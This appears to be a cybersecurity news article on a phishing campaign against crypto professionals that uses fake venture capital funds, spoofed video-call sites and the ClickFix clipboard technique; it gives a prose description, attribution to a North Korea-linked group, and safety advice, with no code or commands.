Hackers Target Crypto Professionals Through Fake VC Funds and Spoofed Video Calls

Researchers at Moonlock Lab have uncovered a large-scale malicious campaign targeting Web3 developers and crypto professionals. The attackers impersonate venture capital representatives, identify victims through LinkedIn, and infect their computers using fake video conferencing services.

Fake Funds with AI-Generated Faces

To create an illusion of legitimacy, the hackers registered three fictitious crypto funds — SolidBit Capital, MegaBit, and Lumax Capital. Each fund has a professionally designed website featuring corporate history, an investment portfolio, and a leadership roster. The profile photos of supposed team members were generated by AI.

Using fake LinkedIn accounts, the scammers contact professionals while posing as senior executives of these funds. Conversations typically begin with flattery about the target's professional accomplishments, followed by a collaboration proposal.

Why This Matters

This campaign marks a significant escalation in social engineering sophistication within the crypto industry. Building entire ecosystems of fictitious companies — complete with websites, biographies, and portfolios — makes fraud detection considerably harder, even for seasoned professionals. The operation also bears hallmarks of threat groups that have systematically targeted crypto projects for years, raising concerns about state-sponsored involvement.

The ClickFix Infection Mechanism

Once rapport is established, the attackers move communication to messaging apps and propose a video call. The victim receives a Calendly link that redirects to a pixel-perfect clone of Zoom, Google Meet, or a similar service.

The spoofed site displays a Cloudflare verification prompt, asking the user to check a box confirming they are not a bot. This is the core of the ClickFix technique: clicking the button silently copies malicious code to the clipboard.

The site then shows an animated tutorial with a countdown timer, instructing the user to open a system terminal, paste the copied text, and hit Enter. The malicious code adapts to the operating system:

• Windows — a hidden process launches directly in RAM without writing files to disk, bypassing antivirus systems;
• macOS — the script checks for Python, silently downloads required libraries, and establishes persistence in the system.

In some cases, victims were sent a standalone application that perfectly replicated the real Zoom interface for Mac. The program mimicked an authorization window, harvested passwords, and forwarded them to a Telegram bot controlled by the attackers.

Links to North Korean Hackers

The domains for the spoofed websites were registered under the name Anatoly Bigdash from Boston, USA. Experts doubt this person actually exists.

Researchers identified significant tactical overlaps with UNC1069, a group that has been breaching crypto projects since 2018. Analysts at Mandiant have previously linked this group to North Korea. The similarities include identical malicious link structures and comparable deception scenarios involving fake video calls.

How to Stay Safe

Cybersecurity professionals recommend checking the registration dates of domains associated with any contact. No legitimate service ever asks users to enter terminal commands to verify their identity or start a video broadcast. Red flags can often be spotted at the stage of following external links.

In June 2025, Hypersphere venture firm investment partner Mehdi Farooq fell victim to a similar phishing attack via a spoofed Zoom call.